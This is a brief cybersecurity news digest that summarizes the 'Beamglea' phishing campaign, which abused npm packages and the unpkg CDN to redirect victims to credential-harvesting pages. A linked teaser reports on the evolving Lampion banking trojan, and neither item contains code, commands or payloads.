npm Phishing Attack 'Beamglea' Targets 135+ Firms

A widespread phishing campaign, dubbed "Beamglea," has been discovered leveraging 175 malicious npm packages to target over 135 companies globally. These packages, downloaded over 26,000 times, do not execute malicious code upon installation but instead use npm and the unpkg.com CDN to host redirect scripts. Attackers distribute HTML lures, likely via email, which, when opened, run a script that sends victims to a credential harvesting page. The script cleverly pre-fills the victim's email address on the phishing page to increase its legitimacy and the attack's success rate. This automated campaign highlights a novel abuse of legitimate open-source infrastructure for resilient and low-cost phishing operations.

Latest mentioned: 10-10

Earliest mentioned: 10-10

Sources

gbhackers.com thehackernews.com

Also Read

Lampion Banking Trojan Evolves with New Social Engineering Tactics

A cybercriminal group has refined its malware campaign by incorporating innovative social engineering techniques and multi-stage infection chains to deliver the Lampion banking trojan. The campaign, active since 2019, targets Portuguese-speaking banks and uses complex infection methods to evade detection. Researchers have documented significant tactical evolution, including the use of ClickFix lures and compromised email accounts. The phishing emails employ convincing banking themes, and the infection chain comprises multiple obfuscated Visual Basic script stages. The Lampion stealer has evolved into a single 700MB DLL file, incorporating encrypted ZIP files to hinder detection.

10-31Read more →